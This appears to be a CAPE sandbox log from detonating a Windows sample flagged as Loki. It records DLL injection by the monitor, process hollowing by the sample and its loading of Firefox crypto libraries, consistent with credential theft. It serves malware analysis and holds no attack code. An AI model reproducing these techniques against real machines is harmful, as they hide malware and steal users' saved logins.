Detections

Yara:

Loki

Analysis

Category Package Started Completed Duration Options Log
FILE exe 2020-06-30 13:28:43 2020-06-30 13:34:22 339 seconds Show Options Show Log
route = tor
2020-05-13 09:11:50,000 [root] INFO: Date set to: 20200630T13:21:51, timeout set to: 200
2020-06-30 13:21:51,031 [root] DEBUG: Starting analyzer from: C:\tmp52sk_on6
2020-06-30 13:21:51,031 [root] DEBUG: Storing results at: C:\ZxMXpUba
2020-06-30 13:21:51,031 [root] DEBUG: Pipe server name: \\.\PIPE\qFSspJcq
2020-06-30 13:21:51,046 [root] DEBUG: Python path: C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32
2020-06-30 13:21:51,046 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-30 13:21:51,046 [root] INFO: Automatically selected analysis package "exe"
2020-06-30 13:21:51,046 [root] DEBUG: Trying to import analysis package "exe"...
2020-06-30 13:21:51,078 [root] DEBUG: Imported analysis package "exe".
2020-06-30 13:21:51,078 [root] DEBUG: Trying to initialize analysis package "exe"...
2020-06-30 13:21:51,078 [root] DEBUG: Initialized analysis package "exe".
2020-06-30 13:21:51,140 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-06-30 13:21:51,156 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-06-30 13:21:51,156 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-06-30 13:21:51,203 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-06-30 13:21:51,203 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-06-30 13:21:51,249 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-06-30 13:21:51,249 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-06-30 13:21:51,281 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-06-30 13:21:51,281 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-06-30 13:21:51,312 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-06-30 13:21:51,312 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-06-30 13:21:51,312 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-06-30 13:21:51,312 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-06-30 13:21:51,312 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-06-30 13:21:51,312 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-06-30 13:21:51,312 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-06-30 13:21:51,312 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-06-30 13:21:51,328 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-06-30 13:21:51,328 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-06-30 13:21:51,328 [lib.api.screenshot] DEBUG: Importing 'math'
2020-06-30 13:21:51,328 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-06-30 13:21:54,312 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-06-30 13:21:54,343 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-06-30 13:21:54,390 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-06-30 13:21:54,390 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-06-30 13:21:54,390 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-06-30 13:21:54,406 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-06-30 13:21:54,406 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-06-30 13:21:54,421 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-06-30 13:21:54,421 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-06-30 13:21:54,421 [root] DEBUG: Initialized auxiliary module "Browser".
2020-06-30 13:21:54,421 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-06-30 13:21:54,421 [root] DEBUG: Started auxiliary module Browser
2020-06-30 13:21:54,421 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-06-30 13:21:54,421 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-06-30 13:21:54,421 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-06-30 13:21:54,421 [root] DEBUG: Started auxiliary module Curtain
2020-06-30 13:21:54,421 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-06-30 13:21:54,421 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-06-30 13:21:54,421 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-06-30 13:21:54,421 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-06-30 13:21:54,765 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-06-30 13:21:54,765 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-06-30 13:21:54,781 [root] DEBUG: Started auxiliary module DigiSig
2020-06-30 13:21:54,781 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-06-30 13:21:54,781 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-06-30 13:21:54,781 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-06-30 13:21:54,796 [root] DEBUG: Started auxiliary module Disguise
2020-06-30 13:21:54,796 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-06-30 13:21:54,796 [root] DEBUG: Initialized auxiliary module "Human".
2020-06-30 13:21:54,796 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-06-30 13:21:54,812 [root] DEBUG: Started auxiliary module Human
2020-06-30 13:21:54,812 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-06-30 13:21:54,812 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-06-30 13:21:54,812 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-06-30 13:21:54,812 [root] DEBUG: Started auxiliary module Procmon
2020-06-30 13:21:54,812 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-06-30 13:21:54,812 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-06-30 13:21:54,812 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-06-30 13:21:54,812 [root] DEBUG: Started auxiliary module Screenshots
2020-06-30 13:21:54,812 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-06-30 13:21:54,812 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-06-30 13:21:54,812 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-06-30 13:21:54,812 [root] DEBUG: Started auxiliary module Sysmon
2020-06-30 13:21:54,828 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-06-30 13:21:54,828 [root] DEBUG: Initialized auxiliary module "Usage".
2020-06-30 13:21:54,828 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-06-30 13:21:54,828 [root] DEBUG: Started auxiliary module Usage
2020-06-30 13:21:54,828 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-06-30 13:21:54,843 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-06-30 13:21:54,843 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option
2020-06-30 13:21:54,843 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option
2020-06-30 13:21:55,109 [lib.api.process] INFO: Successfully executed process from path "C:\Users\Rebecca\AppData\Local\Temp\file.exe" with arguments "" with pid 5848
2020-06-30 13:21:55,109 [lib.api.process] INFO: Monitor config for process 5848: C:\tmp52sk_on6\dll\5848.ini
2020-06-30 13:21:55,125 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp52sk_on6\dll\MEySJo.dll, loader C:\tmp52sk_on6\bin\oLJOzVO.exe
2020-06-30 13:21:55,265 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\qFSspJcq.
2020-06-30 13:21:55,265 [root] DEBUG: Loader: Injecting process 5848 (thread 5908) with C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:21:55,265 [root] DEBUG: Process image base: 0x00400000
2020-06-30 13:21:55,265 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:21:55,265 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-30 13:21:55,265 [root] DEBUG: Successfully injected DLL C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:21:55,281 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5848
2020-06-30 13:21:57,281 [lib.api.process] INFO: Successfully resumed process with pid 5848
2020-06-30 13:21:58,000 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-06-30 13:21:58,046 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-30 13:21:58,046 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-30 13:21:58,062 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 5848 at 0x6ae60000, image base 0x400000, stack from 0x126000-0x130000
2020-06-30 13:21:58,062 [root] INFO: Loaded monitor into process with pid 5848
2020-06-30 13:21:58,078 [root] DEBUG: OpenProcessHandler: Injection info created for Pid 5848, handle 0xbc.
2020-06-30 13:21:58,078 [root] INFO: Disabling sleep skipping.
2020-06-30 13:21:58,078 [root] INFO: Disabling sleep skipping.
2020-06-30 13:21:58,078 [root] INFO: Disabling sleep skipping.
2020-06-30 13:21:58,078 [root] INFO: Disabling sleep skipping.
2020-06-30 13:21:58,093 [root] DEBUG: set_caller_info: Adding region at 0x00210000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-06-30 13:21:58,093 [root] DEBUG: set_caller_info: Adding region at 0x012F0000 to caller regions list (kernel32::GetSystemTime).
2020-06-30 13:21:58,109 [root] DEBUG: DLL loaded at 0x756F0000: C:\Windows\system32\cryptbase (0xc000 bytes).
2020-06-30 13:21:58,125 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x12f0000
2020-06-30 13:21:58,125 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x012F0000 size 0x400000.
2020-06-30 13:21:58,125 [root] DEBUG: DumpPEsInRange: Scanning range 0x12f0000 - 0x12f1000.
2020-06-30 13:21:58,125 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x12f0000-0x12f1000.
2020-06-30 13:21:58,578 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ZxMXpUba\CAPE\5848_62638212158412030262020 (size 0xe27)
2020-06-30 13:21:58,593 [root] DEBUG: DumpRegion: Dumped stack region from 0x012F0000, size 0x1000.
2020-06-30 13:21:58,671 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ZxMXpUba\CAPE\5848_29165013658412030262020 (size 0x93f0)
2020-06-30 13:21:58,671 [root] DEBUG: DumpRegion: Dumped stack region from 0x00210000, size 0xa000.
2020-06-30 13:21:58,671 [root] DEBUG: set_caller_info: Adding region at 0x00230000 to caller regions list (ntdll::memcpy).
2020-06-30 13:21:58,703 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ZxMXpUba\CAPE\5848_208931874758412030262020 (size 0x1a)
2020-06-30 13:21:58,703 [root] DEBUG: DumpRegion: Dumped stack region from 0x00230000, size 0x1000.
2020-06-30 13:21:58,734 [root] INFO: Announced 32-bit process name: file.exe pid: 5540
2020-06-30 13:21:58,734 [lib.api.process] INFO: Monitor config for process 5540: C:\tmp52sk_on6\dll\5540.ini
2020-06-30 13:21:58,734 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp52sk_on6\dll\MEySJo.dll, loader C:\tmp52sk_on6\bin\oLJOzVO.exe
2020-06-30 13:21:58,750 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\qFSspJcq.
2020-06-30 13:21:58,750 [root] DEBUG: Loader: Injecting process 5540 (thread 5580) with C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:21:58,750 [root] DEBUG: Process image base: 0x00400000
2020-06-30 13:21:58,765 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:21:58,765 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-30 13:21:58,765 [root] DEBUG: Successfully injected DLL C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:21:58,781 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5540
2020-06-30 13:21:58,781 [root] DEBUG: DLL loaded at 0x756A0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-06-30 13:21:58,812 [root] DEBUG: DLL unloaded from 0x00400000.
2020-06-30 13:21:58,812 [root] DEBUG: CreateProcessHandler: using lpCommandLine: "C:\Users\Rebecca\AppData\Local\Temp\file.exe" .
2020-06-30 13:21:58,812 [root] DEBUG: CreateProcessHandler: Injection info set for new process 5540, ImageBase: 0x00400000
2020-06-30 13:21:58,812 [root] INFO: Announced 32-bit process name: file.exe pid: 5540
2020-06-30 13:21:58,812 [lib.api.process] INFO: Monitor config for process 5540: C:\tmp52sk_on6\dll\5540.ini
2020-06-30 13:21:58,812 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp52sk_on6\dll\MEySJo.dll, loader C:\tmp52sk_on6\bin\oLJOzVO.exe
2020-06-30 13:21:58,828 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\qFSspJcq.
2020-06-30 13:21:58,843 [root] DEBUG: Loader: Injecting process 5540 (thread 5580) with C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:21:58,843 [root] DEBUG: Process image base: 0x00400000
2020-06-30 13:21:58,843 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:21:58,843 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-30 13:21:58,843 [root] DEBUG: Successfully injected DLL C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:21:58,843 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5540
2020-06-30 13:21:58,843 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x108 amd local view 0x03180000 to global list.
2020-06-30 13:21:58,843 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x108 to target process 5540.
2020-06-30 13:21:58,859 [root] INFO: Announced 32-bit process name: file.exe pid: 5540
2020-06-30 13:21:58,859 [lib.api.process] INFO: Monitor config for process 5540: C:\tmp52sk_on6\dll\5540.ini
2020-06-30 13:21:58,859 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp52sk_on6\dll\MEySJo.dll, loader C:\tmp52sk_on6\bin\oLJOzVO.exe
2020-06-30 13:21:58,859 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\qFSspJcq.
2020-06-30 13:21:58,875 [root] DEBUG: Loader: Injecting process 5540 (thread 0) with C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:21:58,875 [root] DEBUG: Error 299 (0x12b) - GetProcessInitialThreadId: Failed to read from process: Only part of a ReadProcessMemory or WriteProcessMemory request was completed.
2020-06-30 13:21:58,875 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed (SessionId=1).
2020-06-30 13:21:58,875 [root] DEBUG: Failed to inject DLL C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:21:58,875 [lib.api.process] ERROR: Unable to inject into 32-bit process with pid 5540, error: 4294967281
2020-06-30 13:21:58,875 [root] DEBUG: SetThreadContextHandler: Hollow process entry point reset via NtSetContextThread to 0x000139DE (process 5540).
2020-06-30 13:21:58,875 [root] INFO: Announced 32-bit process name: file.exe pid: 5540
2020-06-30 13:21:58,890 [lib.api.process] INFO: Monitor config for process 5540: C:\tmp52sk_on6\dll\5540.ini
2020-06-30 13:21:58,890 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp52sk_on6\dll\MEySJo.dll, loader C:\tmp52sk_on6\bin\oLJOzVO.exe
2020-06-30 13:21:58,906 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\qFSspJcq.
2020-06-30 13:21:58,906 [root] DEBUG: Loader: Injecting process 5540 (thread 5580) with C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:21:58,906 [root] DEBUG: Process image base: 0x00400000
2020-06-30 13:21:58,906 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:21:58,906 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-30 13:21:58,906 [root] DEBUG: Successfully injected DLL C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:21:58,906 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5540
2020-06-30 13:21:58,906 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-06-30 13:21:58,906 [root] DEBUG: DumpProcess: Module entry point VA is 0x000139DE.
2020-06-30 13:21:58,984 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x18200.
2020-06-30 13:21:58,984 [root] DEBUG: ResumeThreadHandler: Dumped PE image from buffer.
2020-06-30 13:21:58,984 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 5540.
2020-06-30 13:21:58,984 [root] DEBUG: DumpSectionViewsForPid: Shared section view found with pid 5540, local address 0x03180000.
2020-06-30 13:21:58,984 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x3180000
2020-06-30 13:21:58,984 [root] DEBUG: DumpSectionViewsForPid: Dumping PE image from shared section view, local address 0x03180000.
2020-06-30 13:21:58,984 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-06-30 13:21:58,984 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x03180000.
2020-06-30 13:21:59,000 [root] DEBUG: DumpProcess: Module entry point VA is 0x000139DE.
2020-06-30 13:21:59,000 [root] DEBUG: readPeSectionsFromProcess: Failed to relocate image back to header image base 0x00400000.
2020-06-30 13:21:59,000 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x18200.
2020-06-30 13:21:59,000 [root] DEBUG: DumpSectionViewsForPid: Dumped PE image from shared section view.
2020-06-30 13:21:59,015 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x3180001-0x3222000.
2020-06-30 13:21:59,015 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 5848
2020-06-30 13:21:59,015 [root] DEBUG: GetHookCallerBase: thread 5408 (handle 0x0), return address 0x00212E8B, allocation base 0x00210000.
2020-06-30 13:21:59,015 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00400000.
2020-06-30 13:21:59,015 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-06-30 13:21:59,015 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-06-30 13:21:59,015 [root] DEBUG: DumpProcess: Module entry point VA is 0x00057B6C.
2020-06-30 13:21:59,031 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-06-30 13:21:59,031 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-30 13:21:59,046 [root] INFO: Disabling sleep skipping.
2020-06-30 13:21:59,046 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-30 13:21:59,046 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 5540 at 0x6ae60000, image base 0x400000, stack from 0x126000-0x130000
2020-06-30 13:21:59,046 [root] DEBUG: Commandline: C:\Users\Rebecca\AppData\Local\Temp\"C:\Users\Rebecca\AppData\Local\Temp\file.exe".
2020-06-30 13:21:59,062 [root] INFO: Loaded monitor into process with pid 5540
2020-06-30 13:21:59,078 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xb8 amd local view 0x76B60000 to global list.
2020-06-30 13:21:59,093 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x95e00.
2020-06-30 13:21:59,093 [root] DEBUG: DLL loaded at 0x76B60000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2020-06-30 13:21:59,093 [root] DEBUG: DLL unloaded from 0x75C80000.
2020-06-30 13:21:59,125 [root] DEBUG: DLL loaded at 0x751C0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-30 13:21:59,125 [root] DEBUG: DLL loaded at 0x74F50000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-30 13:21:59,140 [root] DEBUG: DLL loaded at 0x756F0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2020-06-30 13:21:59,171 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xe4 amd local view 0x68840000 to global list.
2020-06-30 13:21:59,187 [root] DEBUG: DLL loaded at 0x68840000: C:\Program Files\Mozilla Firefox\nss3 (0x22f000 bytes).
2020-06-30 13:21:59,218 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6A900000 for section view with handle 0xe4.
2020-06-30 13:21:59,218 [root] DEBUG: DLL loaded at 0x6A900000: C:\Program Files\Mozilla Firefox\mozglue (0x71000 bytes).
2020-06-30 13:21:59,234 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xdc amd local view 0x758D0000 to global list.
2020-06-30 13:21:59,234 [root] DEBUG: DLL loaded at 0x758D0000: C:\Windows\system32\CRYPT32 (0x122000 bytes).
2020-06-30 13:21:59,249 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x75810000 for section view with handle 0xdc.
2020-06-30 13:21:59,249 [root] DEBUG: DLL loaded at 0x75810000: C:\Windows\system32\MSASN1 (0xc000 bytes).
2020-06-30 13:21:59,249 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74C70000 for section view with handle 0xe4.
2020-06-30 13:21:59,265 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\VERSION (0x9000 bytes).
2020-06-30 13:21:59,265 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x75AE0000 for section view with handle 0xdc.
2020-06-30 13:21:59,281 [root] DEBUG: DLL loaded at 0x75AE0000: C:\Windows\system32\WINTRUST (0x2f000 bytes).
2020-06-30 13:21:59,281 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6BBC0000 for section view with handle 0xe4.
2020-06-30 13:21:59,281 [root] DEBUG: DLL loaded at 0x6BBC0000: C:\Windows\system32\dbghelp (0xeb000 bytes).
2020-06-30 13:21:59,453 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6A7F0000 for section view with handle 0xe4.
2020-06-30 13:21:59,578 [root] DEBUG: DLL loaded at 0x6A7F0000: C:\Windows\system32\MSVCP140 (0x71000 bytes).
2020-06-30 13:21:59,734 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x73420000 for section view with handle 0xe4.
2020-06-30 13:21:59,875 [root] DEBUG: DLL loaded at 0x73420000: C:\Windows\system32\VCRUNTIME140 (0x15000 bytes).
2020-06-30 13:21:59,937 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6D150000 for section view with handle 0xe4.
2020-06-30 13:21:59,953 [root] DEBUG: DLL loaded at 0x6D150000: C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0 (0x4000 bytes).
2020-06-30 13:21:59,953 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6D060000 for section view with handle 0xe4.
2020-06-30 13:21:59,968 [root] DEBUG: DLL loaded at 0x6D060000: C:\Windows\system32\ucrtbase (0xe0000 bytes).
2020-06-30 13:21:59,968 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6D020000 for section view with handle 0xe4.
2020-06-30 13:21:59,968 [root] DEBUG: DLL loaded at 0x6D020000: C:\Windows\system32\api-ms-win-core-timezone-l1-1-0 (0x3000 bytes).
2020-06-30 13:21:59,968 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6D000000 for section view with handle 0xe4.
2020-06-30 13:21:59,984 [root] DEBUG: DLL loaded at 0x6D000000: C:\Windows\system32\api-ms-win-core-file-l2-1-0 (0x3000 bytes).
2020-06-30 13:21:59,984 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6CFF0000 for section view with handle 0xe4.
2020-06-30 13:21:59,984 [root] DEBUG: DLL loaded at 0x6CFF0000: C:\Windows\system32\api-ms-win-core-localization-l1-2-0 (0x3000 bytes).
2020-06-30 13:21:59,984 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6CFE0000 for section view with handle 0xe4.
2020-06-30 13:22:00,000 [root] DEBUG: DLL loaded at 0x6CFE0000: C:\Windows\system32\api-ms-win-core-processthreads-l1-1-1 (0x3000 bytes).
2020-06-30 13:22:00,000 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6CFD0000 for section view with handle 0xe4.
2020-06-30 13:22:00,015 [root] DEBUG: DLL loaded at 0x6CFD0000: C:\Windows\system32\api-ms-win-core-file-l1-2-0 (0x3000 bytes).
2020-06-30 13:22:00,015 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x73880000 for section view with handle 0xe4.
2020-06-30 13:22:00,015 [root] DEBUG: DLL loaded at 0x73880000: C:\Windows\system32\api-ms-win-crt-string-l1-1-0 (0x4000 bytes).
2020-06-30 13:22:00,015 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x73870000 for section view with handle 0xe4.
2020-06-30 13:22:00,031 [root] DEBUG: DLL loaded at 0x73870000: C:\Windows\system32\api-ms-win-crt-heap-l1-1-0 (0x3000 bytes).
2020-06-30 13:22:00,031 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x73800000 for section view with handle 0xe4.
2020-06-30 13:22:00,046 [root] DEBUG: DLL loaded at 0x73800000: C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0 (0x4000 bytes).
2020-06-30 13:22:00,046 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x737F0000 for section view with handle 0xe4.
2020-06-30 13:22:00,046 [root] DEBUG: DLL loaded at 0x737F0000: C:\Windows\system32\api-ms-win-crt-convert-l1-1-0 (0x4000 bytes).
2020-06-30 13:22:00,062 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x737B0000 for section view with handle 0xe4.
2020-06-30 13:22:00,062 [root] DEBUG: DLL loaded at 0x737B0000: C:\Windows\system32\api-ms-win-crt-locale-l1-1-0 (0x3000 bytes).
2020-06-30 13:22:00,093 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x737E0000 for section view with handle 0xe4.
2020-06-30 13:22:00,109 [root] DEBUG: DLL loaded at 0x737E0000: C:\Windows\system32\api-ms-win-crt-math-l1-1-0 (0x5000 bytes).
2020-06-30 13:22:00,281 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x73600000 for section view with handle 0xe4.
2020-06-30 13:22:00,312 [root] DEBUG: DLL loaded at 0x73600000: C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0 (0x5000 bytes).
2020-06-30 13:22:00,343 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x737A0000 for section view with handle 0xe4.
2020-06-30 13:22:00,343 [root] DEBUG: DLL loaded at 0x737A0000: C:\Windows\system32\api-ms-win-crt-time-l1-1-0 (0x3000 bytes).
2020-06-30 13:22:00,343 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x73670000 for section view with handle 0xe4.
2020-06-30 13:22:00,359 [root] DEBUG: DLL loaded at 0x73670000: C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0 (0x3000 bytes).
2020-06-30 13:22:00,359 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x736E0000 for section view with handle 0xe4.
2020-06-30 13:22:00,359 [root] DEBUG: DLL loaded at 0x736E0000: C:\Windows\system32\api-ms-win-crt-environment-l1-1-0 (0x3000 bytes).
2020-06-30 13:22:00,375 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x72360000 for section view with handle 0xe4.
2020-06-30 13:22:00,390 [root] DEBUG: DLL loaded at 0x72360000: C:\Windows\system32\api-ms-win-crt-utility-l1-1-0 (0x3000 bytes).
2020-06-30 13:22:00,390 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x71180000 for section view with handle 0xe4.
2020-06-30 13:22:00,671 [root] DEBUG: DLL loaded at 0x71180000: C:\Windows\system32\WINMM (0x32000 bytes).
2020-06-30 13:22:00,671 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x73570000 for section view with handle 0xe4.
2020-06-30 13:22:00,671 [root] DEBUG: DLL loaded at 0x73570000: C:\Windows\system32\WSOCK32 (0x7000 bytes).
2020-06-30 13:22:00,703 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x114 amd local view 0x6B3B0000 to global list.
2020-06-30 13:22:00,703 [root] DEBUG: DLL loaded at 0x6B3B0000: C:\Program Files\Mozilla Firefox\softokn3 (0x37000 bytes).
2020-06-30 13:22:00,718 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6A120000 for section view with handle 0x114.
2020-06-30 13:22:00,718 [root] DEBUG: DLL loaded at 0x6A120000: C:\Program Files\Mozilla Firefox\freebl3 (0x6f000 bytes).
2020-06-30 13:22:00,890 [root] DEBUG: DLL unloaded from 0x6A120000.
2020-06-30 13:22:00,890 [root] DEBUG: DLL unloaded from 0x6B3B0000.
2020-06-30 13:22:00,921 [root] DEBUG: DLL unloaded from 0x68840000.
2020-06-30 13:22:00,937 [root] DEBUG: DLL unloaded from 0x72070000.
2020-06-30 13:22:01,031 [root] DEBUG: DLL unloaded from 0x72070000.
2020-06-30 13:22:01,031 [root] DEBUG: DLL unloaded from 0x76450000.
